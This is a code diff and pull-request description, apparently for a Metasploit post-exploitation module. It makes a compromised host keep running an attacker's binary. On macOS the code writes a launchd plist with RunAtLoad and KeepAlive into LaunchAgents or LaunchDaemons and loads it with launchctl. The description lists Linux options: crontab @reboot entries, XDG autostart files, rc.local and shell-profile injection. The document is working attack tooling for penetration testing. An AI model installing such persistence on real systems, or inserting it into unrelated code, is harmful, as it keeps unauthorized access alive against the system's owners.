+			<string>#{plistname}</string>
+			<key>Program</key>
+			<string>#{binpath}</string>
+			<key>RunAtLoad</key>
+			<true/>
+			<key>KeepAlive</key>
+			#{keepalive}
+		</dict>
+		</plist>|
+		plist.gsub!(/^\t\t/,'')
+		if @homedir == '/' # root
+			agentsdir = ::File.join(@homedir, "/Library/LaunchDaemons")
+			plistfile = ::File.join(agentsdir, plistname)
+
+			print_status("This file will be now executed and installed as a daemon")
+			@force_no_execute = true # prevent from launching it twice
+			write_file(plistfile, plist)
+			print_status("Launchd plist file added in #{plistfile}")
+			cmd_exec('launchctl load -w ' + plistfile)
+		else
+			#check if directory exist 
+			agentsdir = ::File.join(@homedir, "/Library/LaunchAgents")
+			plistfile = ::File.join(agentsdir, plistname)
+			#Not created upon install
+			unless dir_exists? agentsdir
+				cmd_exec('mkdir -p ' + agentsdir)
+			end
+			write_file(plistfile, plist)
+			print_status("Launchd plist file added in #{plistfile}")
+			print_status("This file will be launched when the user login")
+		end
+	end
+
+	def check_arch
+		arch = get_arch
+		unless arch == 'x86'
+			print_error("This architecture is not suported with this module (#{arch})")
+			return false
+		end
+		return true
+	end
+end
+

--- a/modules/post/osx/manage/persistence.rb
+++ b/modules/post/osx/manage/persistence.rb
@@ -163,7 +163,6 @@ class Metasploit3 < Msf::Post
 
 
 	# Function to make the binary file persistent
-	# Warning : on some system like OEL crontab may not be in PATH 
 	#-------------------------------------------------------------------------------
 	def make_persistent(binpath)
 


### PR DESCRIPTION
This patch will create a pesistence mixin  shared between osx / linux ans win persistence post module.

For Osx , the persistence is done through launchd by adding a crafted plist file in /Users/username/Library/LaunchAgents for normal user or /Library/LaunchDaemons for root. Keepalive is a feature of launchd

For Linux there is 4 differents methods : 

1) Crontab : this method is the recommended one and will add a @reboot entry in the user crontab config while keeping previous configuration.
2) Autostart : This method works only if Xorg is detected. For normal user, it will add a desktop file  in ~/.config/autostart and for root /etc/xdg/autostart will be used.
3) INIT : This method will add en entry in /etc/rc.local (only root)
4) Profile : This method will add en entry in the user shell profile file (bashrc, zshrc , cshrc ....). 

Keepalive is done through a bashscript.
